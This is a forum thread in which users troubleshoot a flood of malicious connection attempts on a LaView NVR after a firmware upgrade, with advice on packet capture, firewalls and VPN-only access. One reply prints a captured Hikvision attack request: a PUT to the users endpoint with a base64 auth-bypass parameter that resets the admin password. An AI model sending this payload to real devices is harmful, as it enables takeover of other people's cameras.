LaView FW Security Flaw (LV-N9808C8E)

[JonDC]

has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?

 

[alastairstevenson]

has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62?

An off-the-wall idea, that's most likely wrong (but stranger things have happened) :
Maybe there is an as-yet undisclosed and unpatched security vulnerability in that version of firmware where the catalogued population using that version is being specifically targeted with an attempted exploit.
I've seen that behaviour with specific Hikvision vulnerabilities.

Do you have the ability to capture the network traffic against the device, to see if the nature of some of the access attempts goes beyond the usual basic probe?
This would need something like a switch with a facility such as port replication to sniff the traffic.

 

[alastairstevenson]

version of firmware where the catalogued population using that version is being specifically targeted with an attempted exploit.

Here is an example of an exposed Hikvision IP camera being hacked by the use of a serious firmware vulnerability.
In this case, it was just the admin password that was changed, as opposed to the device being bricked.

1656    2937.222673853    47.214.172.52    192.168.1.90    HTTP/XML    339    PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1

PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1
Content-Type: application/xml
Content-Length: 141
Host: xxx.180.45.xxx
Connection: close

<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema"><id>1</id><userName>admin</userName><password>asdf1234</password></User>

 

[mikeynags]

has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
View attachment 100804View attachment 100805View attachment 100806

What type of firewall is this thing behind? Or do you have it directly connected to the Internet?

 

[alastairstevenson]

What type of firewall is this thing behind?

A google search suggests it's an Xfinity device.
Presumably it's not just commenting on what's hitting the gateway itself - that's practically continuous.
There may well be port forwarding configured to the device the logs are referencing.

Use Xfinity xFi Advanced Security

Learn more about using Xfinity xFi Advanced Security. xFi Advanced Security helps prevent customers from accidentally accessing risky sites, blocks remote access to smart devices from known dangerous sources and monitors network activity in real time to prevent security risks.

www.xfinity.com

 

[iwanttosee]

has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
View attachment 100804View attachment 100805View attachment 100806

Cut off internet access to the NVR and Cameras. If you need to access it remotely, use OpenVPN.